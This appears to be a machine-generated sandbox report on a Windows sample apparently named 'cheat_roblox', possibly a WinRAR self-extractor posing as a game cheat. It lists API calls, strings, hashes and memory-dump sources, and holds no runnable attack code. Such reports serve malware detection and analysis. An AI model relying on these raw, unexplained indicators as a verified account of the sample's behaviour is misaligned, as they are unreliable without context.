                                                                                                                  • Instruction ID: b980fac78a17e08e71f9943bc009a446e1d3a474aa6038379368a1db02cbbcb0
                                                                                                                  • Opcode Fuzzy Hash: 89b76225f611734f1827ebf27dd46062ec279a58f062f7148514824cdf62f394
                                                                                                                  • Instruction Fuzzy Hash: 8D51D363A0868340FA149B25E4463BD2751FB85BC4F484132EFEE87396CE3EE489C349
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E23EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6E7E30811), ref: 00007FF6E7E23EFD
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E1E993
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1011579015-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3947729631-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 680105476-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3215553584-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: GetDlgItem.USER32 ref: 00007FF6E7E3F0E3
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: ShowWindow.USER32 ref: 00007FF6E7E3F109
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F11E
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F136
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F157
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F173
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F1B6
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F1D4
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F1E8
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F212
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F22A
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E3FD03
                                                                                                                  Similarity
                                                                                                                  • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4003826521-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E41604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6E7E41573,?,?,?,00007FF6E7E4192A), ref: 00007FF6E7E4162B
                                                                                                                  • DloadProtectSection.DELAYIMP ref: 00007FF6E7E415C9
                                                                                                                  Similarity
                                                                                                                  • API ID: DloadHandleModuleProtectSection
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2883838935-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E240BC: FindFirstFileW.KERNELBASE ref: 00007FF6E7E2410B
                                                                                                                    • Part of subcall function 00007FF6E7E240BC: FindFirstFileW.KERNEL32 ref: 00007FF6E7E2415E
                                                                                                                    • Part of subcall function 00007FF6E7E240BC: GetLastError.KERNEL32 ref: 00007FF6E7E241AF
                                                                                                                  • FindClose.KERNELBASE(?,?,00000000,00007FF6E7E30811), ref: 00007FF6E7E23EFD
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1464966427-0
                                                                                                                  APIs
                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF6E7E2207E), ref: 00007FF6E7E220F6
                                                                                                                  Similarity
                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2591292051-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: File
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 749574446-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: FileType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3081899298-0
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1611563598-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                  • API String ID: 2659423929-3508440684
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                                                  • String ID: %ls$%s: %s
                                                                                                                  • API String ID: 2539828978-2259941744
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                  • API String ID: 1759834784-2761157908
                                                                                                                  Similarity
                                                                                                                  • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                                                  • String ID: rtmp
                                                                                                                  • API String ID: 3587137053-870060881
                                                                                                                  Similarity
                                                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1693479884-0
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3140674995-0
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1239891234-0
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  APIs
                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E7E4FAC4
                                                                                                                    • Part of subcall function 00007FF6E7E47934: GetCurrentProcess.KERNEL32(00007FF6E7E50CCD), ref: 00007FF6E7E47961
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                  • String ID: *?$.
                                                                                                                  • API String ID: 2518042432-3972193922
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy_s
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                  • String ID:
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: .
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E224C0: CreateFileW.KERNELBASE ref: 00007FF6E7E2259B
                                                                                                                    • Part of subcall function 00007FF6E7E224C0: GetLastError.KERNEL32 ref: 00007FF6E7E225AE
                                                                                                                    • Part of subcall function 00007FF6E7E224C0: CreateFileW.KERNEL32 ref: 00007FF6E7E2260E
                                                                                                                    • Part of subcall function 00007FF6E7E224C0: GetLastError.KERNEL32 ref: 00007FF6E7E22617
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E215D0
                                                                                                                    • Part of subcall function 00007FF6E7E23980: MoveFileW.KERNEL32 ref: 00007FF6E7E239BD
                                                                                                                    • Part of subcall function 00007FF6E7E23980: MoveFileW.KERNEL32 ref: 00007FF6E7E23A34
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Version
                                                                                                                  • String ID:
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3215553584-4108050209
                                                                                                                  • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                                                  • Instruction ID: 94426867f7315b7fa30c8f6928cf1eae55353f72bf7f887e7f7594ff037eb5d2
                                                                                                                  • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                                                  • Instruction Fuzzy Hash: B681F223A1924242EEB88B25C44077D2294EF61B44F141531DDA9DBA95EF3FE847F38B
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3215553584-4108050209
                                                                                                                  • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                                                  • Instruction ID: 0797b9b627c6010631aed52dc12c3c3ce8747f8b4b8efed2d173851599bcf88b
                                                                                                                  • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                                                  • Instruction Fuzzy Hash: A871E623A0C24246FBA88B19D04437D23909F41744F141931DEE9D7A96EE6FE847B7CB
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 0-4203073231
                                                                                                                  • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                                                  • Instruction ID: 198facd1b5ca2524e64c1fbd76e9c279d6f0e8c6d318c5de192c94f275640fac
                                                                                                                  • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                                                  • Instruction Fuzzy Hash: B051A037B286908BD724CF25E400A9E73A5F388798F045126EF9A93B08CB3DE945CF40
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                                                  • Instruction ID: f7d844031a393bc1022637320a10384089f3da2222ed45452dec13058040870d
                                                                                                                  • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                                                  • Instruction Fuzzy Hash: EE41BC33724A4886EA04CF2AE8152A977A1A758FD0B5D9036DFADCB764EE3DD142C304
                                                                                                                  APIs
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 54951025-0
                                                                                                                  • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                                                  • Instruction ID: 74d51a65190dbc68581c9a63ed405c3b30c190da509c713c905b4b96b40861d0
                                                                                                                  • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                                                  • Instruction Fuzzy Hash: 35B09221E17A06C2EA082B15BC8235422A4BF58B00F948078C19C82320DE2E20A58706
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 93e830777a8553980f5fe243353a36f6d8d27a5fc8052bc9569f2c684e316ecf
                                                                                                                  • Instruction ID: 43960feb6118644e15be28498b5f620de752477fe479e8e68eb1494a29b206ab
                                                                                                                  • Opcode Fuzzy Hash: 93e830777a8553980f5fe243353a36f6d8d27a5fc8052bc9569f2c684e316ecf
                                                                                                                  • Instruction Fuzzy Hash: 478225A3A097C196D715CF24D4087BC3BA1E752F88F198136CAAE873A5DE3ED846C315
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                                                  • Instruction ID: 6dd67302250babf6278ae64aeaa6b0301743f170119f09c0484388a3a365c504
                                                                                                                  • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                                                  • Instruction Fuzzy Hash: 6E627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 569adc29ececf777b1726fc3f5cd67d4b9927b4b604ee9515eb09b13eba64041
                                                                                                                  • Instruction ID: 3b4d8f0424c4a9d1eb0477913615e35027d3107828c13b3530bc81c6fa38950b
                                                                                                                  • Opcode Fuzzy Hash: 569adc29ececf777b1726fc3f5cd67d4b9927b4b604ee9515eb09b13eba64041
                                                                                                                  • Instruction Fuzzy Hash: C68201B3A096C09AD724CF38C4087FC77A1E755B48F188136CAAE87799CE3E9445D716
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                                                  • Instruction ID: 6b7080b52be5116da3e81f8b4d4993356b7cf008b42f30f37001a69ac18846b4
                                                                                                                  • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                                                  • Instruction Fuzzy Hash: DD22F4B3B206508BD728CF25C89AA5E3766F798744B4B8228DF4ACB785DB3DD505CB40
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                                                  • Instruction ID: cc40af293668434d08b973d528a799541f9213ffbed19ba2f6859f529fe519dd
                                                                                                                  • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                                                  • Instruction Fuzzy Hash: C93201B3A042919BE718CF28D444BBC37A1F755B08F018139DA9A87B98DF3DE861CB45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                                                  • Instruction ID: 32df7a39b2ba4db9fb6181dc104668afd194fb9d0956c683fc05f8442bdc190c
                                                                                                                  • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                                                  • Instruction Fuzzy Hash: 68C19DB7B281908FE350CF7AE400A9D3BB1F39878CB519125DF69A7B09D639E645CB40
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                                                  • Instruction ID: 802cd14788dabc068361107ed03573b5453845fe865bf7cab5e0a33572304afe
                                                                                                                  • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                                                  • Instruction Fuzzy Hash: 3DA15973A0818296EB25CB24D408BFD2795EB90788F454635DAEDC7795CE3EEC41C70A
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                                                  • Instruction ID: 8fdc0bd6cc682bb5bab1582a0c9ec7de6bdb6c42349d27ba401860e37d3f4caa
                                                                                                                  • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                                                  • Instruction Fuzzy Hash: E9C10573A292E04DE302CBB5A4248FD3FB5E71E34DB4A4152EFE667B4AD52D5201DB20
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 190572456-0
                                                                                                                  • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                                                  • Instruction ID: 0a7b0ea32bcc47a51b5df13f36e042a80982e8101e832b79a3004f579b619e53
                                                                                                                  • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                                                  • Instruction Fuzzy Hash: 2E911E63B1858296EB11CF29D4513FD2721FFA5788F441031EE9E9765AEE3EE60AC304
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                                                  • Instruction ID: 7ad5d185c9f9ced5b0766b7e0b7cb70c2b6f5649196f385d20ff1066fe34a1af
                                                                                                                  • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                                                  • Instruction Fuzzy Hash: 64613223B181D249EB01CF75C5005FD7FA9AB19784B4A8032CEEA97646EE3EE506CB15
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                                                  • Instruction ID: d80946cdb290be0458885e9469f5a4978408f142448d9d8af9732349fe4928c0
                                                                                                                  • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                                                  • Instruction Fuzzy Hash: F1514473B181625BE7288F28D408BBD3765FB90B48F458134DBD987698DE3EE941CB05
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                                                  • Instruction ID: b8ef426bc624ce3a3bd27f34b734999554821c03c3e470e27a537af71eb931d6
                                                                                                                  • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                                                  • Instruction Fuzzy Hash: 1831D2A3A086829BD708CF1AD95437E67D1BB45790F048139DB9AC3B41DE3DE842C705
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                                                  • Instruction ID: 0482698429a82cf36f6245cca95938c8f88ca86112ce4946e97a8f6de4e34dca
                                                                                                                  • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                                                                  • Instruction Fuzzy Hash: EBF06272B182958BDBA48F2DE84272977E0FB08380F848039D6DDC7B54DA3D94618F09
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                                                  • Instruction ID: 3db823d74d00744b7a1eeb915cfdc2c24699251948964909802c6cbc220af968
                                                                                                                  • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                                                                  • Instruction Fuzzy Hash: 01A0026390CC46D0E6448B50F8602702330FB50301B504071F0BDD20A4EF3EA402D34A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                                                                  • API String ID: 3668304517-727060406
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                  • String ID: DXGIDebug.dll$UNC$\\?\
                                                                                                                  • API String ID: 4097890229-4048004291
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                                  • API String ID: 431506467-1315819833
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                  • API String ID: 3215553584-2617248754
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                                                  • String ID: STATIC
                                                                                                                  • API String ID: 781704138-1882779555
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                                                                  • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                  • API String ID: 2721297748-1533471033
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Text
                                                                                                                  • String ID: LICENSEDLG
                                                                                                                  • API String ID: 1601838975-2177901306
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                  • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                  • API String ID: 2915667086-2207617598
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: $
                                                                                                                  • API String ID: 3668304517-227171996
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2940173790-393685449
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocClearStringVariant
                                                                                                                  • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                  • API String ID: 1959693985-3505469590
                                                                                                                  APIs
